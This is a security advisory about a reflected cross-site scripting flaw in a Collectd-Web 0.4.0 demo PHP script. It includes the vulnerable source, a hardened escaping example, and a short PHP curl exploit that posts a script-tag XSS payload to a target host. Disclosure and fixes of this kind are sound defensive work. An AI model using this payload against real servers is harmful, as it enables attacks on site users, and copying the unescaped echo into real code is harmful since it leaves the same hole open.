Collectd-Web 0.4.0 Cross Site Scripting

Posted May 22, 2016
Authored by Mehrdad Linux, Hossein Masoudi

Collectd-Web version 0.4.0 suffers from a cross site scripting vulnerability.

tags | exploit, web, xss
SHA-256 | 677f1e138f0fabb145e534d65964d3ca14c126d42cb45b63a3c352e5b9a2b25a

Title - Collectd-web XSS

# Exploit Title: XSS Vulnerability in Collectd-web
# Date: Sun May 22 11:55:36 EDT 2016
# Reported Date: Sun May 22 11:55:36 EDT 2016
# Vendor Homepage: https://collectd.org/wiki/index.php/Collectd-web
# Version: 0.4.0
# Software Link: https://github.com/httpdss/collectd-web
# Solution: https://github.com/httpdss/collectd-web/issues/77
# Exploit Author: MehrdadLinux
# Tested On: Linux Platforms.
# Facebook: https://facebook.com/MehrdadLinux
# Twitter: http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------

XSS Vulnerability in Collectd-web 0.4.0 – January 2016


2. BACKGROUND
-------------------------
Collectd-web is a web-based front-end for RRD data collected by collectd.
It is based on contrib/collection.cgi, a demo CGI script included in
collectd.
With strong emphasis on the usage of Jquery and JqueryUI, Collectd-Web
manages to give sysadmins a nice yet functional interface.


3. DESCRIPTION
-------------------------
XSS in ajax_post.php
https://github.com/httpdss/collectd-web/blob/master/media/jqtouch/demos/main/ajax_post.php

1  <?php
2  $theaters = array("Los Gatos Cinema","Cinelux Plaza Theatre","Camera 7");
3  $movies = array("Transformers","Knocked Up","Live Free Die Hard");
4  $title = "-";
5  if ($_POST["zip"]) {
6      $title = "Zip " . $_POST['zip'];
7  } else {
8      $title = $_POST['movie'];
9  }
10 ?>
11 <div>
12     <div class="toolbar">
13         <h1><?php echo $title ?></h1>
14         <a href="#" class="button back">Back</a>
15     </div>
16     <ul class="edgetoedge">
17     <?php
18     if ($_POST['zip']) {
19         foreach ($theaters as $theater) {
20             echo '<li><a href="#theater">' . $theater . '</a></li>';
21         }
22     } else {
23         foreach ($movies as $movie) {
24             echo '<li><a href="#movie">' . $movie . '</a></li>';
25         }
26     }
27     ?>
28     </ul>
29     <form action="ajax_post.php" method="POST">
30         <ul class="rounded">
31             <li><input type="text" name="zip" value="" placeholder="Live post event test" /></li>
32         </ul>
33         <a style="margin:0 10px;color:rgba(0,0,0,.9)" href="#" class="submit whiteButton">Submit</a>
34
35     </form>
36 </div>

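The vulnerability starts at line 5, in the handling of the zip POST parameter:
the POSTed value (zip on line 6, or movie on line 8) is copied into $title and
echoed on line 13 without HTML escaping.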
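
The fix for the pattern in lines 4-13, shown as an added example (not code from
collectd-web or from the advisory authors): the same title logic with the output
HTML-escaped at the point of echo. The helper names build_title() and h() and the
sample inputs are assumptions made for this illustration.

```php
<?php
// Added example, not collectd-web code: hardened form of the title logic
// in ajax_post.php (lines 4-13 of the listing above).

// Hypothetical helper: builds the title from an array shaped like $_POST.
// Unlike the original truthiness test, it also rejects array-valued
// parameters (e.g. zip[]=x) before they reach string concatenation, and
// keeps the "-" default when neither field is supplied.
function build_title(array $post): string
{
    $zip   = isset($post['zip'])   && is_string($post['zip'])   ? $post['zip']   : '';
    $movie = isset($post['movie']) && is_string($post['movie']) ? $post['movie'] : '';

    if ($zip !== '') {
        return 'Zip ' . $zip;
    }
    return $movie !== '' ? $movie : '-';
}

// Hypothetical helper: escape a value for an HTML text or attribute context.
// ENT_QUOTES covers both quote characters; ENT_SUBSTITUTE replaces invalid
// UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample inputs standing in for $_POST.
$samples = [
    ['zip' => '95030'],
    ['movie' => '<b>bold</b> & "quoted"'],
    ['zip' => ['array-valued']],
];

foreach ($samples as $post) {
    $title = build_title($post);
    // What line 13 of the listing emits today: markup in the value survives.
    echo 'unescaped: <h1>' . $title . "</h1>\n";
    // What it should emit: the value is rendered as text, not as markup.
    echo 'escaped:   <h1>' . h($title) . "</h1>\n";
}
```

The path shows the script is one of the bundled jqtouch demos, so a deployment
that does not serve media/jqtouch/demos does not expose it at all.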


====================================Exploit=========================================
<?php
// Target host is taken from the first command-line argument.
$yourtarget = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$yourtarget/collectd-web/media/jqtouch/demos/main/ajax_post.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
// POST the movie parameter; the response shows it reflected unescaped in <h1>.
curl_setopt($ch, CURLOPT_POSTFIELDS,
"movie=></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))</SCRIPT>");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>

====================================Exploit=========================================

4. DISCOVERED BY
-------------------------

The vulnerability has been discovered by Mehrdad Abbasi (MehrdadLinux) and
Hossein Masoudi (cs.masoudi)
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com


5. LEGAL NOTICES
-------------------------

The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this
information.